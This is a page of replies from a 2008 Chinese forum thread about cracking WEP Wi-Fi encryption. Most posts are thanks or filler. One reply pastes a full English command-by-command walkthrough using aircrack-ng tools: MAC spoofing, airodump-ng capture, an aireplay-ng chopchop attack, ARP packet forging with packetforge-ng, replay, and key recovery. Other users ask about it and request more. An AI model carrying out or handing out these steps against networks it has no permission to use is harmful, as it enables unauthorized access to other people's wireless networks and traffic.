007nb
发表于 2008-5-19 21:58
晕。回复了也看不到啊
Space315
发表于 2008-5-19 22:08
新手学习下。。。。。
david98
发表于 2008-5-19 22:15
<p>回复了,先看看内容。</p>
wusa
发表于 2008-5-19 22:24
写的不错..............
xyjwww
发表于 2008-5-19 22:37
uouououpoupou
zhuweiji
发表于 2008-5-20 02:13
ddddddddddddddddddddddddddd
superconductor
发表于 2008-5-20 08:30
必要的回复还是需要的!不过必要的东西都已经出来了!
david98
发表于 2008-5-20 08:35
<p>lily兄的文章总是有那么多期待,为2200用户带来了福音,更为本论坛带来了福音。</p><p>有个问题一直纳闷:一直以为无客户端的破解就一定要-1的虚拟连接,但是本文没有却也能注入。因此想了解-4这个模式具体是什么?是不是这个命令本身就包含了和AP之间建立一个连接?</p><p>命令中rtap0是一个用于监听的接口,而eth1是一个控制接口是不是这样理解?</p><p>根据aireplay-ng 的-i参数:指定从rtap0网卡中获取数据</p>
icekylin
发表于 2008-5-20 09:04
非常需要 感谢楼主
david98
发表于 2008-5-20 09:08
<p>We will also need to know the target's name (ESSID), MAC address, and the channel. Please note that my wireless device is "eth1" but yours may be different; use "iwconfig" to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)<br/><font color="#0000ff" style="BACKGROUND-COLOR: #ffffff;">iwlist eth1 scan</font></p><p>Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.<br/><font color="#0000ff" style="BACKGROUND-COLOR: #ffffff;">rmmod ipw2200<br/>modprobe ipw2200 rtap_iface=1</font></p><p>Next enable wireless and change MAC (changing MAC is optional).<br/><font color="#0000ff">ifconfig eth1 up hw ether 00:11:22:33:44:55</font></p><p>Configure wireless w/ essid, channel, and a fake key.<br/><font color="#0000ff">iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed</font></p><p>Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.<br/><font color="#0000ff">airodump-ng --bssid <AP MAC> -w dump rtap0</font></p><p>Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).<br/><font color="#0000ff">aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1</font></p><p>A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "<font color="#ff0000">replay_dec-######.xor</font>"</p><p>Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.</p><p>Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.<br/><font color="#0000ff">packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y <font color="#ff0000">replay_dec-####.xor</font> -w arp-request</font></p><p>Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.<br/><font color="#0000ff">aireplay-ng -2 -r arp-request eth1</font></p><p>Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.<br/><font color="#ff0000">aircrack-ng -z dump*.cap</font></p><p><font color="#ff0000"></font></p><p><font color="#ff0000">谁把关键部分翻页一下,谢谢</font></p>
sy100
发表于 2008-5-20 09:27
<p>谢谢! 再学习!!</p><p></p>
a191442029
发表于 2008-5-20 09:48
这个要顶的 前面的那个方法到最后一步抓包能显示数据就是 ARP那个一直是 0 试试这个
页:
1
[2]
3
4
5
6
7
8
9
10
11